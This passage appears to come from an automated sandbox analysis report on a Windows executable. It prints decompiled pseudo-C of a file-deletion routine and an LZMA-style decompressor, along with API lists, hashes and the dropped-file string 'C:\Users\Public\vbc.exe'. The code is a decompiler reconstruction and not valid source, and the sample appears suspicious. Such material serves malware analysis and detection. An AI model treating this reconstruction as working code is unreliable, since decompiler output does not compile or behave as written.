                              					if( *0x421d58 != 0x5c) {
                              						goto L11;
                              					}
                              					goto L10;
                              				} else {
                              					__eflags = _t40;
                              					if(_t40 == 0) {
                              						L31:
                              						__eflags = _a4;
                              						if(_a4 == 0) {
                              							L39:
                              							return _t40;
                              						}
                              						__eflags = _v16;
                              						if(_v16 != 0) {
                              							_t40 = E0040659C(_t73);
                              							__eflags = _t40;
                              							if(_t40 == 0) {
                              								goto L39;
                              							}
                              							E00405BC0(_t73);
                              							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
                              							__eflags = _t40;
                              							if(_t40 != 0) {
                              								return E0040534F(0xffffffe5, _t73);
                              							}
                              							__eflags = _v8;
                              							if(_v8 == 0) {
                              								goto L33;
                              							}
                              							E0040534F(0xfffffff1, _t73);
                              							return E00406007(_t72, _t73, 0);
                              						}
                              						L33:
                              						 *0x4247e8 =  *0x4247e8 + 1;
                              						return _t40;
                              					}
                              					__eflags = _t69 & 0x00000002;
                              					if((_t69 & 0x00000002) == 0) {
                              						goto L31;
                              					}
                              					goto L5;
                              				}
                              			}




















                              APIs
                              • DeleteFileA.KERNELBASE(?,?,76712754,766F13E0,00000000), ref: 00405A19
                              • lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A61
                              • lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A82
                              • lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A88
                              • FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A99
                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
                              • FindClose.KERNEL32(00000000), ref: 00405B57
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: "C:\Users\Public\vbc.exe" $\*.*
                              • API String ID: 2035342205-1024247051
                              • Opcode ID: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                              • Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
                              • Opcode Fuzzy Hash: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                              • Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E00406925() {
                              				unsigned short _t531;
                              				signed int _t532;
                              				void _t533;
                              				void* _t534;
                              				signed int _t535;
                              				signed int _t565;
                              				signed int _t568;
                              				signed int _t590;
                              				signed int* _t607;
                              				void* _t614;
                              
                              				L0:
                              				while(1) {
                              					L0:
                              					if( *(_t614 - 0x40) != 0) {
                              						 *(_t614 - 0x34) = 1;
                              						 *(_t614 - 0x84) = 7;
                              						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                              						L132:
                              						 *(_t614 - 0x54) = _t607;
                              						L133:
                              						_t531 =  *_t607;
                              						_t590 = _t531 & 0x0000ffff;
                              						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                              						if( *(_t614 - 0xc) >= _t565) {
                              							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                              							 *(_t614 - 0x40) = 1;
                              							_t532 = _t531 - (_t531 >> 5);
                              							 *_t607 = _t532;
                              						} else {
                              							 *(_t614 - 0x10) = _t565;
                              							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                              							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                              						}
                              						if( *(_t614 - 0x10) >= 0x1000000) {
                              							L139:
                              							_t533 =  *(_t614 - 0x84);
                              							L140:
                              							 *(_t614 - 0x88) = _t533;
                              							goto L1;
                              						} else {
                              							L137:
                              							if( *(_t614 - 0x6c) == 0) {
                              								 *(_t614 - 0x88) = 5;
                              								goto L170;
                              							}
                              							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                              							goto L139;
                              						}
                              					} else {
                              						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                              						__esi =  *(__ebp - 0x60);
                              						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                              						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                              						__ecx =  *(__ebp - 0x3c);
                              						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                              						__ecx =  *(__ebp - 4);
                              						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                              						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                              						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              						if( *(__ebp - 0x38) >= 4) {
                              							if( *(__ebp - 0x38) >= 0xa) {
                              								_t97 = __ebp - 0x38;
                              								 *_t97 =  *(__ebp - 0x38) - 6;
                              							} else {
                              								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                              							}
                              						} else {
                              							 *(__ebp - 0x38) = 0;
                              						}
                              						if( *(__ebp - 0x34) == __edx) {
                              							__ebx = 0;
                              							__ebx = 1;
                              							L60:
                              							__eax =  *(__ebp - 0x58);
                              							__edx = __ebx + __ebx;
                              							__ecx =  *(__ebp - 0x10);
                              							__esi = __edx + __eax;
                              							__ecx =  *(__ebp - 0x10) >> 0xb;
                              							__ax =  *__esi;
                              							 *(__ebp - 0x54) = __esi;
                              							__edi = __ax & 0x0000ffff;
                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              							if( *(__ebp - 0xc) >= __ecx) {
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              								__cx = __ax;
                              								_t216 = __edx + 1; // 0x1
                              								__ebx = _t216;
                              								__cx = __ax >> 5;
                              								 *__esi = __ax;
                              							} else {
                              								 *(__ebp - 0x10) = __ecx;
                              								0x800 = 0x800 - __edi;
                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              								__ebx = __ebx + __ebx;
                              								 *__esi = __cx;
                              							}
                              							 *(__ebp - 0x44) = __ebx;
                              							if( *(__ebp - 0x10) >= 0x1000000) {
                              								L59:
                              								if(__ebx >= 0x100) {
                              									goto L54;
                              								}
                              								goto L60;
                              							} else {
                              								L57:
                              								if( *(__ebp - 0x6c) == 0) {
                              									 *(__ebp - 0x88) = 0xf;
                              									goto L170;
                              								}
                              								__ecx =  *(__ebp - 0x70);
                              								__eax =  *(__ebp - 0xc);
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              								_t202 = __ebp - 0x70;
                              								 *_t202 =  *(__ebp - 0x70) + 1;
                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              								goto L59;
                              							}
                              						} else {
                              							__eax =  *(__ebp - 0x14);
                              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              							if(__eax >=  *(__ebp - 0x74)) {
                              								__eax = __eax +  *(__ebp - 0x74);
                              							}
                              							__ecx =  *(__ebp - 8);
                              							__ebx = 0;
                              							__ebx = 1;
                              							__al =  *((intOrPtr*)(__eax + __ecx));
                              							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                              							L40:
                              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                              							__ecx =  *(__ebp - 0x58);
                              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                              							 *(__ebp - 0x48) = __eax;
                              							__eax = __eax + 1;
                              							__eax = __eax << 8;
                              							__eax = __eax + __ebx;
                              							__esi =  *(__ebp - 0x58) + __eax * 2;
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              							__ax =  *__esi;
                              							 *(__ebp - 0x54) = __esi;
                              							__edx = __ax & 0x0000ffff;
                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                              							if( *(__ebp - 0xc) >= __ecx) {
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              								__cx = __ax;
                              								 *(__ebp - 0x40) = 1;
                              								__cx = __ax >> 5;
                              								__ebx = __ebx + __ebx + 1;
                              								 *__esi = __ax;
                              							} else {
                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                              								 *(__ebp - 0x10) = __ecx;
                              								0x800 = 0x800 - __edx;
                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                              								__ebx = __ebx + __ebx;
                              								 *__esi = __cx;
                              							}
                              							 *(__ebp - 0x44) = __ebx;
                              							if( *(__ebp - 0x10) >= 0x1000000) {
                              								L38:
                              								__eax =  *(__ebp - 0x40);
                              								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                              									while(1) {
                              										if(__ebx >= 0x100) {
                              											break;
                              										}
                              										__eax =  *(__ebp - 0x58);
                              										__edx = __ebx + __ebx;
                              										__ecx =  *(__ebp - 0x10);
                              										__esi = __edx + __eax;
                              										__ecx =  *(__ebp - 0x10) >> 0xb;
                              										__ax =  *__esi;
                              										 *(__ebp - 0x54) = __esi;
                              										__edi = __ax & 0x0000ffff;
                              										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              										if( *(__ebp - 0xc) >= __ecx) {
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              											__cx = __ax;
                              											_t169 = __edx + 1; // 0x1
                              											__ebx = _t169;
                              											__cx = __ax >> 5;
                              											 *__esi = __ax;
                              										} else {
                              											 *(__ebp - 0x10) = __ecx;
                              											0x800 = 0x800 - __edi;
                              											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              											__ebx = __ebx + __ebx;
                              											 *__esi = __cx;
                              										}
                              										 *(__ebp - 0x44) = __ebx;
                              										if( *(__ebp - 0x10) < 0x1000000) {
                              											L45:
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0xe;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t155 = __ebp - 0x70;
                              											 *_t155 =  *(__ebp - 0x70) + 1;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              										}
                              									}
                              									L53:
                              									_t172 = __ebp - 0x34;
                              									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                              									L54:
                              									__al =  *(__ebp - 0x44);
                              									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                              									L55:
                              									if( *(__ebp - 0x64) == 0) {
                              										 *(__ebp - 0x88) = 0x1a;
                              										goto L170;
                              									}
                              									__ecx =  *(__ebp - 0x68);
                              									__al =  *(__ebp - 0x5c);
                              									__edx =  *(__ebp - 8);
                              									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              									 *( *(__ebp - 0x68)) = __al;
                              									__ecx =  *(__ebp - 0x14);
                              									 *(__ecx +  *(__ebp - 8)) = __al;
                              									__eax = __ecx + 1;
                              									__edx = 0;
                              									_t191 = __eax %  *(__ebp - 0x74);
                              									__eax = __eax /  *(__ebp - 0x74);
                              									__edx = _t191;
                              									L79:
                              									 *(__ebp - 0x14) = __edx;
                              									L80:
                              									 *(__ebp - 0x88) = 2;
                              									goto L1;
                              								}
                              								if(__ebx >= 0x100) {
                              									goto L53;
                              								}
                              								goto L40;
                              							} else {
                              								L36:
                              								if( *(__ebp - 0x6c) == 0) {
                              									 *(__ebp - 0x88) = 0xd;
                              									L170:
                              									_t568 = 0x22;
                              									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                              									_t535 = 0;
                              									L172:
                              									return _t535;
                              								}
                              								__ecx =  *(__ebp - 0x70);
                              								__eax =  *(__ebp - 0xc);
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              								_t121 = __ebp - 0x70;
                              								 *_t121 =  *(__ebp - 0x70) + 1;
                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              								goto L38;
                              							}
                              						}
                              					}
                              					L1:
                              					_t534 =  *(_t614 - 0x88);
                              					if(_t534 > 0x1c) {
                              						L171:
                              						_t535 = _t534 | 0xffffffff;
                              						goto L172;
                              					}
                              					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
                              						case 0:
                              							if( *(_t614 - 0x6c) == 0) {
                              								goto L170;
                              							}
                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                              							_t534 =  *( *(_t614 - 0x70));
                              							if(_t534 > 0xe1) {
                              								goto L171;
                              							}
                              							_t538 = _t534 & 0x000000ff;
                              							_push(0x2d);
                              							asm("cdq");
                              							_pop(_t570);
                              							_push(9);
                              							_pop(_t571);
                              							_t610 = _t538 / _t570;
                              							_t540 = _t538 % _t570 & 0x000000ff;
                              							asm("cdq");
                              							_t605 = _t540 % _t571 & 0x000000ff;
                              							 *(_t614 - 0x3c) = _t605;
                              							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                              							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                              							_t613 = (0x300 << _t605 + _t610) + 0x736;
                              							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                              								L10:
                              								if(_t613 == 0) {
                              									L12:
                              									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                              									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                              									goto L15;
                              								} else {
                              									goto L11;
                              								}
                              								do {
                              									L11:
                              									_t613 = _t613 - 1;
                              									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                              								} while (_t613 != 0);
                              								goto L12;
                              							}
                              							if( *(_t614 - 4) != 0) {
                              								GlobalFree( *(_t614 - 4));
                              							}
                              							_t534 = GlobalAlloc(0x40, 0x600); // executed
                              							 *(_t614 - 4) = _t534;
                              							if(_t534 == 0) {
                              								goto L171;
                              							} else {
                              								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                              								goto L10;
                              							}
                              						case 1:
                              							L13:
                              							__eflags =  *(_t614 - 0x6c);
                              							if( *(_t614 - 0x6c) == 0) {
                              								 *(_t614 - 0x88) = 1;
                              								goto L170;
                              							}
                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                              							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                              							_t45 = _t614 - 0x48;
                              							 *_t45 =  *(_t614 - 0x48) + 1;
                              							__eflags =  *_t45;
                              							L15:
                              							if( *(_t614 - 0x48) < 4) {
                              								goto L13;
                              							}
                              							_t546 =  *(_t614 - 0x40);
                              							if(_t546 ==  *(_t614 - 0x74)) {
                              								L20:
                              								 *(_t614 - 0x48) = 5;
                              								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                              								goto L23;
                              							}
                              							 *(_t614 - 0x74) = _t546;
                              							if( *(_t614 - 8) != 0) {
                              								GlobalFree( *(_t614 - 8));
                              							}
                              							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                              							 *(_t614 - 8) = _t534;
                              							if(_t534 == 0) {
                              								goto L171;
                              							} else {
                              								goto L20;
                              							}
                              						case 2:
                              							L24:
                              							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                              							 *(_t614 - 0x84) = 6;
                              							 *(_t614 - 0x4c) = _t553;
                              							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                              							goto L132;
                              						case 3:
                              							L21:
                              							__eflags =  *(_t614 - 0x6c);
                              							if( *(_t614 - 0x6c) == 0) {
                              								 *(_t614 - 0x88) = 3;
                              								goto L170;
                              							}
                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                              							_t67 = _t614 - 0x70;
                              							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                              							__eflags =  *_t67;
                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                              							L23:
                              							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                              							if( *(_t614 - 0x48) != 0) {
                              								goto L21;
                              							}
                              							goto L24;
                              						case 4:
                              							goto L133;
                              						case 5:
                              							goto L137;
                              						case 6:
                              							goto L0;
                              						case 7:
                              							__eflags =  *(__ebp - 0x40) - 1;
                              							if( *(__ebp - 0x40) != 1) {
                              								__eax =  *(__ebp - 0x24);
                              								 *(__ebp - 0x80) = 0x16;
                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              								__eax =  *(__ebp - 0x28);
                              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              								__eax =  *(__ebp - 0x2c);
                              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              								__eax = 0;
                              								__eflags =  *(__ebp - 0x38) - 7;
                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              								__al = __al & 0x000000fd;
                              								__eax = (__eflags >= 0) - 1 + 0xa;
                              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                              								__eax =  *(__ebp - 4);
                              								__eax =  *(__ebp - 4) + 0x664;
                              								__eflags = __eax;
                              								 *(__ebp - 0x58) = __eax;
                              								goto L68;
                              							}
                              							__eax =  *(__ebp - 4);
                              							__ecx =  *(__ebp - 0x38);
                              							 *(__ebp - 0x84) = 8;
                              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                              							goto L132;
                              						case 8:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__eax =  *(__ebp - 4);
                              								__ecx =  *(__ebp - 0x38);
                              								 *(__ebp - 0x84) = 0xa;
                              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                              							} else {
                              								__eax =  *(__ebp - 0x38);
                              								__ecx =  *(__ebp - 4);
                              								__eax =  *(__ebp - 0x38) + 0xf;
                              								 *(__ebp - 0x84) = 9;
                              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                              							}
                              							goto L132;
                              						case 9:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								goto L89;
                              							}
                              							__eflags =  *(__ebp - 0x60);
                              							if( *(__ebp - 0x60) == 0) {
                              								goto L171;
                              							}
                              							__eax = 0;
                              							__eflags =  *(__ebp - 0x38) - 7;
                              							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                              							__eflags = _t258;
                              							0 | _t258 = _t258 + _t258 + 9;
                              							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                              							goto L75;
                              						case 0xa:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__eax =  *(__ebp - 4);
                              								__ecx =  *(__ebp - 0x38);
                              								 *(__ebp - 0x84) = 0xb;
                              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                              								goto L132;
                              							}
                              							__eax =  *(__ebp - 0x28);
                              							goto L88;
                              						case 0xb:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__ecx =  *(__ebp - 0x24);
                              								__eax =  *(__ebp - 0x20);
                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              							} else {
                              								__eax =  *(__ebp - 0x24);
                              							}
                              							__ecx =  *(__ebp - 0x28);
                              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              							L88:
                              							__ecx =  *(__ebp - 0x2c);
                              							 *(__ebp - 0x2c) = __eax;
                              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              							L89:
                              							__eax =  *(__ebp - 4);
                              							 *(__ebp - 0x80) = 0x15;
                              							__eax =  *(__ebp - 4) + 0xa68;
                              							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                              							goto L68;
                              						case 0xc:
                              							L99:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0xc;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t334 = __ebp - 0x70;
                              							 *_t334 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t334;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							__eax =  *(__ebp - 0x2c);
                              							goto L101;
                              						case 0xd:
                              							goto L36;
                              						case 0xe:
                              							goto L45;
                              						case 0xf:
                              							goto L57;
                              						case 0x10:
                              							L109:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0x10;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t365 = __ebp - 0x70;
                              							 *_t365 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t365;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							goto L111;
                              						case 0x11:
                              							L68:
                              							__esi =  *(__ebp - 0x58);
                              							 *(__ebp - 0x84) = 0x12;
                              							goto L132;
                              						case 0x12:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__eax =  *(__ebp - 0x58);
                              								 *(__ebp - 0x84) = 0x13;
                              								__esi =  *(__ebp - 0x58) + 2;
                              								goto L132;
                              							}
                              							__eax =  *(__ebp - 0x4c);
                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                              							__ecx =  *(__ebp - 0x58);
                              							__eax =  *(__ebp - 0x4c) << 4;
                              							__eflags = __eax;
                              							__eax =  *(__ebp - 0x58) + __eax + 4;
                              							goto L130;
                              						case 0x13:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								_t469 = __ebp - 0x58;
                              								 *_t469 =  *(__ebp - 0x58) + 0x204;
                              								__eflags =  *_t469;
                              								 *(__ebp - 0x30) = 0x10;
                              								 *(__ebp - 0x40) = 8;
                              								L144:
                              								 *(__ebp - 0x7c) = 0x14;
                              								goto L145;
                              							}
                              							__eax =  *(__ebp - 0x4c);
                              							__ecx =  *(__ebp - 0x58);
                              							__eax =  *(__ebp - 0x4c) << 4;
                              							 *(__ebp - 0x30) = 8;
                              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                              							L130:
                              							 *(__ebp - 0x58) = __eax;
                              							 *(__ebp - 0x40) = 3;
                              							goto L144;
                              						case 0x14:
                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                              							__eax =  *(__ebp - 0x80);
                              							goto L140;
                              						case 0x15:
                              							__eax = 0;
                              							__eflags =  *(__ebp - 0x38) - 7;
                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              							__al = __al & 0x000000fd;
                              							__eax = (__eflags >= 0) - 1 + 0xb;
                              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                              							goto L120;
                              						case 0x16:
                              							__eax =  *(__ebp - 0x30);
                              							__eflags = __eax - 4;
                              							if(__eax >= 4) {
                              								_push(3);
                              								_pop(__eax);
                              							}
                              							__ecx =  *(__ebp - 4);
                              							 *(__ebp - 0x40) = 6;
                              							__eax = __eax << 7;
                              							 *(__ebp - 0x7c) = 0x19;
                              							 *(__ebp - 0x58) = __eax;
                              							goto L145;
                              						case 0x17:
                              							L145:
                              							__eax =  *(__ebp - 0x40);
                              							 *(__ebp - 0x50) = 1;
                              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                              							goto L149;
                              						case 0x18:
                              							L146:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0x18;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t484 = __ebp - 0x70;
                              							 *_t484 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t484;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							L148:
                              							_t487 = __ebp - 0x48;
                              							 *_t487 =  *(__ebp - 0x48) - 1;
                              							__eflags =  *_t487;
                              							L149:
